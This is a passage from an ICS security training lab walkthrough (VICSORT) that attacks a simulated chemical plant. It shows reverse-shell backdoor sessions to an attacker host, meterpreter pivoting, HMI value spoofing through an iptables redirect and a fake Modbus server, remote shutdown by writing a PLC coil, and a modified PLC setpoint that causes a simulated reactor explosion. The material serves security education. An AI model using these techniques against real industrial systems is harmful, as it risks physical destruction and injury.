Hint: Some lines were ellipsized, use -l to show in full.
root@hmi-container:/root#
~~~

We now have our service active and running.


### Connecting to Persistent BackDoor

At this stage, I can comfortably close my backdoor and each time I try to connect to it, it will automatically connect.

I test with a new connection below and it works flawlessly.

~~~bash
┌──(root💀attacker-container)-[/home/kali/scripts/CVE-2021-26828_ScadaBR_RCE]
└─# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.90.197; set LPORT 8443; run; exit -y"
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
LHOST => 192.168.90.197
LPORT => 8443
[*] Started reverse TCP handler on 192.168.90.197:8443
[*] Sending stage (36 bytes) to 192.168.90.5
[*] Command shell session 1 opened (192.168.90.197:8443 -> 192.168.90.5:51246) at 2023-11-30 21:27:30 +0000

hostname
hmi-container

whoami
root
~~~

You can now link this new backdoor session to msfconsole allowing you to leverage the meterpreter shell functionality.<br >
Remember to kill your previous sessions within msfconsole and open a new session using the new backdoor.
~~~bash
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell sparc/bsd               192.168.90.197:4444 -> 192.168.90.5:51354 (192.168.90.5)

msf6 exploit(multi/handler) > sessions -k 1
[*] Killing the following session(s): 1
[*] Killing session 1
[*] 192.168.90.5 - Command shell session 1 closed.

msf6 exploit(multi/handler) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.90.197
LHOST => 192.168.90.197
msf6 exploit(multi/handler) > set  LPORT 8443
LPORT => 8443
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.90.197:8443
[*] Sending stage (36 bytes) to 192.168.90.5
[*] Command shell session 4 opened (192.168.90.197:8443 -> 192.168.90.5:57758) at 2023-11-30 21:34:31 +0000

background

Background session 4? [y/N]  y
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  4         shell x86/linux               192.168.90.197:8443 -> 192.168.90.5:57758 (192.168.90.5)

msf6 exploit(multi/handler) > sessions -u 4
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [4]

[*] Upgrading session ID: 4
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.90.197:4433
[*] Sending stage (1017704 bytes) to 192.168.90.5
[*] Meterpreter session 5 opened (192.168.90.197:4433 -> 192.168.90.5:43166) at 2023-11-30 21:34:53 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information          Connection
  --  ----  ----                   -----------          ----------
  4         shell x86/linux                             192.168.90.197:8443 -> 192.168.90.5:57758 (192.168.90.5)
  5         meterpreter x86/linux  root @ 192.168.90.5  192.168.90.197:4433 -> 192.168.90.5:43166 (192.168.90.5)

msf6 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > shell
Process 68361 created.
Channel 1 created.

hostname
hmi-container
~~~~

Now that we have the IT aspect out of the way, we can try to access attack the OT side of the environment.


# Attacking the ICS

There is separate documentation already created for this.
In this article, I'll simply be applying most of the work already researched in that documentation.

In this section, I am going to demonstrate the following attacks:

- Exfiltrating data from the HMI - Low Impact attack
- Manipulating the values displayed on the HMI - Medium Impact attack
- Remotely shutting down the plant - Medium Impact attack
- Catastrophic Damage to the Environment - High Impact attack


## Exfiltrating Data from HMI

This has been demonstrated above. In the same way we are able to load new files onto the HMI, we are able to exfiltrate data from the HMI, if any.
This is facilitated by the root access the attacker has.

## Manipulating the values displayed on the HMI

### Redirect Modbus Traffic to HMI

In order to manipulate the values displayed on the HMI, we first need to redirect ScadaBR traffic to the attacker manually.
This is achieved by modifying the Modbus IP properties on Scada BR under Data Sources.

Remember, we can RDP into the attacker-container and have the credentials to access the ScadaBR UI.

The screenshot below shows the ScadaBR setting page that you have access to through the Web UI.
In this case, the Modbus server information is modified from *192.168.95.2* to *192.168.90.157* (The *attacker-container*).
<br>[*slight typo in screenshot there*].
![scada](../figures/cyber_attack_scenario/scadabr.png)


When you do this though, you will notice the HMI failing to display values.

### Handle Modbus Requests made to attacker

On the _attacker-container_, you need to listen to these incoming communications on port 502.
Remember ScadaBr is the Modbus client that initiates the Modbus Request to a server, which in our testbed is the PLC.
However, now the server shall be the attacker-container.

The attacker needs to complete the 3-way handshake for the client to send the Modbus Request.
Running the command below starts socat listening on port 502 and completing any TCP handshake made to it.

~~~bash
# output snipped for illustration purposes
┌──(root㉿attacker-container)-[/home/kali/vicsort/scapy_scripts]
└─# socat -d -d - TCP-LISTEN:502,fork
2023/10/17 20:57:41 socat[105041] N forked off child process 107306
2023/10/17 20:57:41 socat[105041] N listening on AF=2 0.0.0.0:502
2023/10/17 20:57:41 socat[107306] N starting data transfer loop with FDs [0,1] and [6,6]
2023/10/17 20:57:41 socat[107290] N exiting with status 0
2023/10/17 20:57:41 socat[105041] N childdied(): handling signal 17
2023/10/17 20:57:42 socat[107306] N socket 2 (fd 6) is at EOF
2023/10/17 20:57:43 socat[105041] N accepting connection from AF=2 192.168.90.5:48874 on AF=2 192.168.90.57:502

2023/10/17 20:57:43 socat[105041] N forked off child process 107323
2023/10/17 20:57:43 socat[105041] N listening on AF=2 0.0.0.0:502
2023/10/17 20:57:43 socat[107323] N starting data transfer loop with FDs [0,1] and [6,6]
2023/10/17 20:57:43 socat[107306] N exiting with status 0
2023/10/17 20:57:43 socat[105041] N childdied(): handling signal 17
2023/10/17 20:57:44 socat[107323] N socket 2 (fd 6) is at EOF
2023/10/17 20:57:44 socat[105041] N accepting connection from AF=2 192.168.90.5:48876 on AF=2 192.168.90.57:502
~~~

Running wireshark from the _attacker-container_, we notice that after a successful TCP 3-way handshake facilitated by `socat`,
the HMI makes a request 3 times and if in all this attempts, it gets no response, then it drops the connection.

It's important to note that for the 3 Modbus Requests, the TCP ACK numbers are all the same. However, 
the TCP Sequence numbers are different. Also, the Modbus Requests are sent 0.5ms apart.

![socat](../figures/cyber_attack_scenario/socat.png)

Below is a side by side of how the 2 of 3 Modbus Requests look like. You can see that the sequence number is the same and the time difference between the 2 packets is about 0.5 seconds.

![capture1](../figures/cyber_attack_scenario/capture1.png)


### Create Modbus Server on attacker

Upon doing abit of research, I was able to come up with a working pymodbus server that can dynamically respond to the modbus requests received. 
This pymodbus server is initially able to receive the modbus requests and generate responses.

Please note that the version of pymodbus being used here is 2.5.2. This is the version that needs to be installed for this code to work. 
I chose it as most of the available documentation online was written around this version.

I created a script called `2.5.2_pymodbus_script.py` that performs the following functions:

- Spins up a modbus server to receive and appropriately respond to Modbus requests from the HMI.
- Incorperating some randomness allowing the values displayed on the HMI to vary within setpoints that can be user defined. This makes the values
  displayed on the HMI appear more natural and close to what we would expect.

This script is already available in the _VICSORTv2 ova_ file.

To run the script, I recommend using [pipenv]("https://pipenv.pypa.io/en/latest/) because this environment has two scripts
that require different pymodbus versions to run.


~~~bash
┌──(root💀attacker-container)-[~/scripts/custom_modbus_server]
└─# pip3 install pipenv


# Install the dependencies in the project folder. This has already been performed though.
┌──(root💀attacker-container)-[~/scripts/custom_modbus_server]
└ pipenv install pymodbus==2.5.2 scapy


┌──(root💀attacker-container)-[~/scripts/custom_modbus_server]
└─# pipenv run ./2.5.2_pymodbus_script.py 
The custom register values are: [64375, 6153, 14032, 44286, 26371, 3509, 20970, 5420, 46504, 23136, 0, 0, 0]
Starting Custom Modbus Server...

^CShutting down the server gracefully...
Server shutdown complete. Exiting...
~~~



If when you execute the `2.5.2_pymodbus_script.py` script, you dont get the above output and instead get
`ModuleNotFoundError: No module named 'pymodbus.server.sync'`, then it simply means the script is being
run with the wrong pymodbus version.

You can confirm that with the commands below.<br>
Notice how the current version on the system is 3.5.4 but this script required 2.5.2

~~~bash
┌──(pymodus_2.5.2_venv)(root💀attacker-container)-[/home/kali/scripts/custom_modbus_server]
└─# pip3 list | grep pymod
pymodbus                       3.5.4
~~~

Running the script:

~~~bash
┌──(root💀attacker-container)-[~/custom_modbus_server]
└─# pipenv run ./2.5.2_pymodbus_script.py
The custom register values are: [64668, 6018, 0, 0, 0, 0, 12218, 4750, 54418, 28989, 0, 0, 0]
Starting Modbus Server...


Received Modbus request for address 1 and count 13
The custom register values are: [64802, 5972, 0, 0, 0, 0, 22445, 6477, 54658, 28880, 0, 0, 0]
Sending Response: b'\x00G\x00\x00\x00\x1d\x01\x04\x1a\xfd"\x17T\x00\x00\x00\x00\x00\x00\x00\x00W\xad\x19M\xd5\x82p\xd0\x00\x00\x00\x00\x00\x00'
###[ ModbusTCP ]###
  transId   = 71
  protoId   = 0
  len       = 29
  unitId    = 1
###[ Modbus ]###
     funcCode  = 0x4
     byteCount = 26
     registerVal= [64802, 5972, 0, 0, 0, 0, 22445, 6477, 54658, 28880, 0, 0, 0]


Received Modbus request for address 1 and count 13
The custom register values are: [64651, 5722, 0, 0, 0, 0, 12276, 4307, 54684, 28860, 0, 0, 0]
Sending Response: b'\x00H\x00\x00\x00\x1d\x01\x04\x1a\xfc\x8b\x16Z\x00\x00\x00\x00\x00\x00\x00\x00/\xf4\x10\xd3\xd5\x9cp\xbc\x00\x00\x00\x00\x00\x00'
###[ ModbusTCP ]###
  transId   = 72
  protoId   = 0
  len       = 29
  unitId    = 1
###[ Modbus ]###
     funcCode  = 0x4
     byteCount = 26
     registerVal= [64651, 5722, 0, 0, 0, 0, 12276, 4307, 54684, 28860, 0, 0, 0]
~~~

When the script is run, you notice values being displayed on the HMI. These values are being controlled by the above script with an
element of some randomness to them to give it a realistic feel and not draw attention if an engineer was watching the screen.

The screenshot below shows the HMI with manipulated values

![scadabr2](../figures/cyber_attack_scenario/scadabr2.png)

### Redirecting PLC destined for traffic to attacker

However, what would even be better is if we didnt need to go into the HMI GUI to change the modbus server IP to
the attacker IP as that would be too obvious incase someone went to double-check.

I'll use `ip tables` to redirect the traffic that is initially originating from the HMI to the PLC and send that traffic to the attacker.
This way, I can maintain the modbus server IP set on the HMI as the PLC IP but still have control of the HMI values via my script.

As shown in the screenshot, change the Host back to *192.168.95.2* (the PLC IP). This should revert the values displayed on the
HMI to valeus being generated from the PLC.
![scadabr3](../figures/cyber_attack_scenario/scadabr3.png)

Then run the command below on the HMI, through the meterpreter shell to redirect Modbus traffic initially destined
for the PLC to the attacker-container.

~~~bash
# To add the rule
sudo iptables -t nat -A OUTPUT -d 192.168.95.2 -j DNAT --to-destination 192.168.90.197

# To delete the rule
sudo iptables -t nat -D OUTPUT -d 192.168.95.2 -j DNAT --to-destination 192.168.90.197
~~~

Keep in mind that:

- This change will only affect the host where the rule is applied (192.168.90.5).
- The actual traffic between hosts might not allow for such redirection if there are security controls in place (like IP whitelisting).
- You need to make sure iptables is installed, and the kernel supports NAT.
- The change is not persistent through reboots. For persistent changes, you'd need to save the iptables rule and apply it on boot (how you do this depends on your Linux distribution).


`iptables` isn't installed on the HMI. Thanks to our `apt` proxy server, we are able to install `iptables` on the 
HMI using the command `apt install iptables -y`.

With iptables in place, by simply running the *add* rule, we are at will able to instantaneously able to redirect HMI modbus
requests from the PLC to the HMI, without interacting with the HMI settings. This assumes the `2.5.2_pymodbus_script.py` is running.
It would be very hard to notice the change in values when that happens.

Deleting the rule instantaneously reverts traffic flow back to the PLC.

The screenshot below shows the legitimate values from the PLC to the HMI.

![hmi-legit](../figures/cyber_attack_scenario/hmi_legit.png)



The screenshot below shows a screenshot from the host computer of the HMI and the physical simulation showing the values on both displays in sync.
The HMI is alittle behind the physical simulation in regard to the values shown, which would be expected.

![sim](../figures/cyber_attack_scenario/sim.png)


The screenshot below shows the NAT rule applied on the HMI, which redirects the Modbus requests from the PLC, where they were originally destined to,
to the attacker container. Once the rule has been applied, on the right, you can see the custom modbus server on the attacker container
now responding to the Modbus requests being received from the HMI.

![nat_rule](../figures/cyber_attack_scenario/rule_applied.png)


The screenshot below shows the values on the HMI and the values on the simulation.
You will notice that there is a difference between the values being displayed on the HMI and the values being displayed on the
sim.

This demonstrates that the values on the HMI have been successfully manipulated.
An attacker with this access would be able to disguise his malicious activity and the plant operators wouldnt be able to
immediately detect an issue on the plant.

![sim1](../figures/cyber_attack_scenario/sim1.png)

## Remotely shutdown the plant

Further more, besides being able to manipulate the values on the HMI, it's also possible to remotely shutdown the plant.
In order to discover this capability, I explored what other modbus functions are available within the environment.

First, its fair to assume that there are some coils in the environment. It would be good to know which coils are at which address, and which values they hold.
The Modbus function code to read the status of coils is 01 (Read Coils). We can use this function code to request the status of a range of coils from the Modbus server.

However, in this case we shall be targeting the PLC and not the HMI because within this environment, the PLC is the legitimate Modbus server and its listening on port 502. So we shall query the PLC directly, but through the HMI.
Remember, if there are any coil operations that can be controlled from the HMI, then the HMI would be the one to make a request to the plc to change the value of a coil, and
therefore cause a certain operation to happen.

For abit of background, we are at the attacker container, and the attacker container has a shell to the HMI. The attacker cant ping the PLC.
The HMI can ping the PLC.
Because the HMI can ping the PLC and the attacker has a shell to the PLC, the attacker can route packets destined for the PLC
through the HMI, as it has root access to the HMI.

To achieve this:

~~~bash
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information          Connection
  --  ----  ----                   -----------          ----------
  4         shell x86/linux                             192.168.90.197:8443 -> 192.168.90.5:57758 (192.168.90.5)
  5         meterpreter x86/linux  root @ 192.168.90.5  192.168.90.197:4433 -> 192.168.90.5:43166 (192.168.90.5)

msf6 exploit(multi/handler) > route add 192.168.95.2 255.255.255.255 5
[*] Route added
~~~

I can now ping 192.168.95.2.

I'll use metasploit to query the first 100 coils and see what values they hold.

Within `auxiliary(scanner/scada/modbusclient)`,

- DATA_ADDRESS: This is typically the starting address for the Modbus operation. Modbus defines several different data models,
  including coils, discrete inputs, input registers, and holding registers. Each of these has its own address space. When you specify a
  DATA_ADDRESS, you're telling the modbusclient where to start reading from or writing to.

- NUMBER: This usually refers to the quantity of entities you want to interact with starting from the DATA_ADDRESS. For example, if you are
  reading coils and you set DATA_ADDRESS to 0 and NUMBER to 100, you would be requesting to read the first 100 coils. This is what we would like to achieve.

~~~bash
msf6 exploit(multi/handler) > use auxiliary/scanner/scada/modbusclient
msf6 auxiliary(scanner/scada/modbusclient) > set rhost 192.168.95.2
rhost => 192.168.95.2
msf6 auxiliary(scanner/scada/modbusclient) > set action read_coils
action => read_coils
msf6 auxiliary(scanner/scada/modbusclient) > set data_address 0
data_address => 0
msf6 auxiliary(scanner/scada/modbusclient) > set number 100
number => 100
msf6 auxiliary(scanner/scada/modbusclient) > run
[*] Running module against 192.168.95.2

[*] 192.168.95.2:502 - Sending READ COILS...
[+] 192.168.95.2:502 - 100 coil values from address 0 :
[+] 192.168.95.2:502 - [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[*] Auxiliary module execution completed
~~~~

This shows that all the first 100 coils have their values set to 0.

Given that I wanted to test the impact of changing the values on all 100 coils, I decided to approach this in groups of 10.
Change 10 coils from False to True (0 to 1) and see if there is any noticeable change within the environment i.e on the HMI.

I wrote a script called `modbus_coils.py` available in `./home/kali/scripts`. This script:

- is able to show you the coil status of a specified range of coils, or a single coil.
- is able to change the state of a coil or range of coils from 0 (False) to 1 (True) and vice versa.
- uses pymodbus 3.5.4

Within the script, you can specify the modbus server you wish to target and the port. In this case, the modbus server we wish to target is the PLC
on `192.168.95.2:502`.

Before running this script, check that you are running pymodbus version 3.5.4. <br>
Below is an example of if the installed version was not 3.5.4.

~~~bash
┌──(root💀attacker-container)-[/home/kali/scripts]
└─# python3 modbus_coils.py 
  File "/home/kali/scripts/modbus_coils.py", line 5, in <module>
    from pymodbus.client import ModbusTcpClient
ImportError: cannot import name 'ModbusTcpClient' from 'pymodbus.client' (/usr/local/lib/python3.11/dist-packages/pymodbus/client/__init__.py)

┌──(root💀attacker-container)-[/home/kali/scripts]
└─# python3
Python 3.11.7 (main, Dec  8 2023, 14:22:46) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pymodbus
>>> pymodbus.__version__
'2.5.2'

┌──(root💀attacker-container)-[/home/kali/scripts]
└─# pip3 install pymodbus==3.5.4

┌──(root💀attacker-container)-[/home/kali/scripts]
└─# ./modbus_coils.py 
usage: modbus_coils.py [-h] {read_coils,write_coils} ...

Modbus Coils Utility

This script provides functionality to read from or write to Modbus coils. 
It supports reading the value(s) from one or multiple coils and writing a value to one or multiple coils.
Set the Modbus server and port within the script.
~~~

~~~bash
┌──(root💀attacker-container)-[/home/kali/scripts]
└─# ./modbus_coils.py
usage: modbus_coils.py [-h] {read_coils,write_coils} ...

Modbus Coils Utility

This script provides functionality to read from or write to Modbus coils.
It supports reading the value(s) from one or multiple coils and writing a value to one or multiple coils.
Set the Modbus server and port within the script.

positional arguments:
  {read_coils,write_coils}
                        Commands
    read_coils          Read the value(s) from Modbus coils
    write_coils         Write a value to Modbus coils

optional arguments:
  -h, --help            show this help message and exit

Examples:
  modbus_coils.py read_coils 40 1    # Reads the value of coil 40.
  modbus_coils.py read_coils 40 10   # Reads values of coils from 40 to 50.

  modbus_coils.py write_coils True 40 1  # Writes the value '1' to coil 40.
  modbus_coils.py write_coils True 40 5  # Writes the value '1' to coils from 40 to 45.
~~~

I use the approach below to check the 100 registers, 10 registers at a time.
In this case, the HMI is showing exactly what's happening within the physical simulation.

~~~bash
┌──(root㉿attacker-container)-[/home/kali/vicsort/scapy_scripts/pymodbus-dev]
└─# ./modbus_coils.py read_coils 0 10

Coils status:
Coil 0: False
Coil 1: False
Coil 2: False
Coil 3: False
Coil 4: False
Coil 5: False
Coil 6: False
Coil 7: False
Coil 8: False
Coil 9: False



┌──(root💀attacker-container)-[/home/kali/scripts/attack_scripts]
└─# ./modbus_coils.py read_coils 10 10

Coils status:
Coil 10: False
Coil 11: False
Coil 12: False
Coil 13: False
Coil 14: False
Coil 15: False
Coil 16: False
Coil 17: False
Coil 18: False
Coil 19: False
~~~

For coil:

- 0 to 9: No noticable change in environment when values changed to True
- 10 to 29: No noticable change in environment when values changed to True
- 30 to 39: No noticable change in environment when values changed to True
- 40 to 49: Pressure values started decreasing steadily. Changing these values back to 0, the pressure started increasing after about 30 seconds. 
- 50 to 59: No noticable change in environment when values changed to True
- 60 to 60: No noticable change in environment when values changed to True
- 70 to 79: No noticable change in environment when values changed to True
- 80 to 89: No noticable change in environment when values changed to True
- 90 to 99: No noticable change in environment when values changed to True



Somewhere within coils 40 to 49, it seems there is a coil that deactivates the chemical process. You note that as the pressure is
increasing, Feed 2 which is an input feed is at max values until the pressure values normalised at about 2600 kPa.

Upon further investigation, I discovered that the coil that controlled that function was coil 40. Coil 40 is initally set to 0.
Toggling this coil to 1 causes the chemical process to shut down gracefully. Setting it back to 0 causes the chemical process to restart again.
It looks like this is some sort of master switch. **An important discovery there**.

> Note however that when you toggle coil 40 to 1, initiating a remote shutdown, and toggle the coil back to 0 again to resume
> normal operation, it takes between 30 to 60 seconds for the environment to start recovering from the remote shutdown.

~~~bash
# Remotely turn the plant off
┌──(root💀attacker-container)-[/home/kali/scripts]
└─# ./modbus_coils.py write_coils true 40 1

Successfully wrote a value of: True, to coils: WriteNCoilResponse(40, 1)

Coils status:
Coil 40: True


# Remotely turn the plant on
┌──(root💀attacker-container)-[/home/kali/scripts]
└─# ./modbus_coils.py write_coils false 40 1

Successfully wrote a value of: False, to coils: WriteNCoilResponse(40, 1)

Coils status:
Coil 40: False
~~~

You can also achieve the same within msfconsole as shown below:

~~~bash
# To remotely shutdown the plant
msf6 auxiliary(scanner/scada/modbusclient) > set action write_coils
action => write_coils
msf6 auxiliary(scanner/scada/modbusclient) > set data_coils 1
data_coils => 1
msf6 auxiliary(scanner/scada/modbusclient) > set data_address 40
data_address => 40
msf6 auxiliary(scanner/scada/modbusclient) > run
[*] Running module against 192.168.95.2

[*] 192.168.95.2:502 - Sending WRITE COILS...
[+] 192.168.95.2:502 - Values 1 successfully written from coil address 40
[*] Auxiliary module execution completed


# To remotely restart the plant
msf6 auxiliary(scanner/scada/modbusclient) > set data_coils 0
data_coils => 0
msf6 auxiliary(scanner/scada/modbusclient) > run
[*] Running module against 192.168.95.2

[*] 192.168.95.2:502 - Sending WRITE COILS...
[+] 192.168.95.2:502 - Values 0 successfully written from coil address 40
[*] Auxiliary module execution completed
~~~


The screenshot below shows normal operation of the environment. The physical simulation and HMI values are in sync

![hack](../figures/cyber_attack_scenario/hack.png)

The screenshot below shows the effect after the shutdown function has been issued via coil 40 (Toggle Coil 40 to True)

![hack1](../figures/cyber_attack_scenario/hack1.png)


### Manipulating HMI values during plant shutdown

It's possible to toggle coil 40 to 1 to shutdown the plant whilst running our custom modbus server allows us shut down the physical process
whilst making it seem like the plant is still running normally as the HMI values are being controlled by our custom modbus server.
Pretty cool.

The screenshot below shows the HMI showing manipulated values whilst the physical process is being shutdown. <br> To achieve this:
- you should have redirected HMI Modbus requests to attacker-container
- Have modbus server on attacker-container ready to listen to HMI Modbus requests
- Set Coil 0 on PLC to True

![hack2](../figures/cyber_attack_scenario/hack2.png)

Upon setting coil 0 on PLC back to False, you notice the chemical process recover. Intermittently toggling this could, for example, potentially
result in a poor product being produced by the chemical process.

The screenshot below shows manipulated HMI values whilst physical process recovers.

![hack3](../figures/cyber_attack_scenario/hack3.png)

## Catastrophic Damage to the Environment

We have seen how to shutdown the environment. What if we want to actually cause some catastrophic damage to the environment.
Well, looking at the envrionment, it looks like the pressure in the tank is being regulated at about 2600 - 2700 kPa.

But we know that the max pressure value that can be sent to the HMI is 65535. This would correspond to a HMI pressure reading
of 3200 kPa.

Earlier on, we were simply manipulating the values on the HMI. What if we set the pressure value set point on the PLC to 65535 (max value) i.e allow the temperature to reach its max value.
This would force the physical process pressure to build up to 3200 kPa causing the plant to seize to function.

What would it take to achieve this?

To achieve this, you would need to actually interface with the PLC itself and change the code running on the PLC.
Since the PLC is responsible for regulating the pressure value in the chemical reactor with the help of the code running on the
plc, we would need to access the workstation machine where the PLC code is probably stored, modify the code and upload new code.

In this demo, I dont show how the *engineering-container* could be compromised, or specifically how new code can be uploaded to the PLC as
generally speaking, this will be specific to the environment and the OT infrastructure being used.

I assume access to the engineering workstation and that the attacker can upload code to the PLC.
In this simulation, `OpenPLC Edtior` is used to write the Ladder logic PLC code used in this environment.

### Modifying the PLC Code
RDP into the *workstation-container* and launch `OpenPLC Editor`. The credentials are:

- username: `worker`
- password: `worker`

~~~bash
# On the vicsort VM, RDP into the workstation container
root@vicsort:/home/vicsort# rdp_workstation

# On the workstation container
worker@workstation-container:~$ cd OpenPLC_Editor/
worker@workstation-container:~/OpenPLC_Editor$ ./openplc_editor.sh
~~~

Within `PLC Code`, open the folder called `chemical` as a project.

Within this project, you can see that there is a variable called `pressure_sp` which is a pressure setpoint.
This value is initially set to **55295** as shown below. The chemical reactor will try and keep the pressure around this level.

![editor1](../figures/cyber_attack_scenario/editor1.png)

If we change this inital set point from **55295** to max value of **65535** as shown below, then the chemical reactor will try and keep the pressure at this max value.
The only problem here is that this is an unsafe max value and keeping the pressure and this very high level has catastrophic consequences.

The screenshot below shows the PLC code with initial setpoints changed. This has already been done for you within the `attack` project folder.
The screenshot below is taken from the attack folder showing the `initialize sp` function block with the modified initial values.

![editor2](../figures/cyber_attack_scenario/editor2.png)

If you wanted to modify the initial file yourself within OpenPLC Editor, follow the steps below:

- Open OpenPLCEditor 
  ```angular2html
  worker@workstation-container:~/OpenPLC_Editor$ ./openplc_editor.sh 
  ./openplc_editor.sh: line 2: cd: /home/worker/OpenPLC_Editor/OpenPLC_Editor: No such file or directory
  ```
- Open new project >> *Edit_PLC_Code* >> *Chemical* >> Click `open` at the bottom of the window
- Click *Function Blocks* >> *initialise_sp* >> Change the initial value of `press_sp_c` from 55295 to 65535.
- Click the *Generate Program for OpenPLC Runtime* icon (Orange downward arrow icon on the OpenPLC toolbar)
- After successful compiling, you will be prompted to save the new OpenPLC program.
- Navigate to *worker* >> *Edit_PLC_Code* >> Under Name (at top of window), give your program a name, e.g `new_plc_program.st` >> *Save*.
- You then have to get this file to any folder within the viscort terminal for upload to OpenPLC. You can use sftp or any other copy technique to achieve this.


The new set points have already been applied for you and saved as new PLC logic under the filename `attack.st` with the `PLC_Code` folder. This file is uploaded to the PLC via the webUI.
The modified file is available under `/home/vicsort/Downloads/PLC Code`.

### Uploading new PLC Code to PLC

To upload the new PLC code to OpenPLC, follow the steps below:

- From your web browser within vicsort, access http://192.168.95.2:8080
- The Current PLC status should be *Running*.
- Click `stop` to stop the PLC.
- Click `Choose File` and navigate to `vicsort/Downloads/PLC Code` and select `attack.st`. Click `open`.
- Click `Upload Program`.
- The program should upload with no errors. 
- However, this version of OpenPLC doesn't redirect automatically. You need to manually navigate back to http://192.168.95.2:8080. The PLC should be back to a *Running* state.
- If you navigate to the 3D simulation or HMI and don't notice any change, then, from the OpenPLC Server homepage, `Stop` and `Run` the PLC and that should trigger the new code.


The screenshot below shows the new PLC code being uploaded to the PLC.

![plc_code](../figures/cyber_attack_scenario/plc_code.png)

As soon as the new code is uploaded, it takes effect and we notice the pressure in the tank start to rise in an attempt to reach that setpoint
specified in the code.

You will notice that on the HMI, I continue to manipulate the values thus hiding the effect of whats actually happening on the physical process.
The screenshot below shows the pressure rising in chemical reactor after new code uploaded.

![manipulate_1](../figures/cyber_attack_scenario/manipulate1.png)

The pressure continues to raise to dangerous levels. However, the HMi continues to show manipulated values.<br> This is potentially dangerous
as the plant operators only find out when there are now physical signs that there is a problem with the physical process like strange noise from the physical process.
Usually, by this time, it may be too late to save the situation without significant damage having occured already.

![manipulate_3](../figures/cyber_attack_scenario/manipulate3.png)

In this simulation, the chemical reactor eventually explodes when max pressure is reached.
This is demonstrated by a simulated explosion of the physical process.

![manipulate_5](../figures/cyber_attack_scenario/manipulate5.png)

Being a simulation, uploading the normal PLC code i.e. `simplified_te.st` restores the simulation back to normal.

This demonstrates catastrophic damage to the chemical process.

# Conclusion
This concludes the VICSORT ICS cyber-attack scenario.

<br>

<hr>
Version 2.0, Apr 2024<br>
© Conrad Ekisa














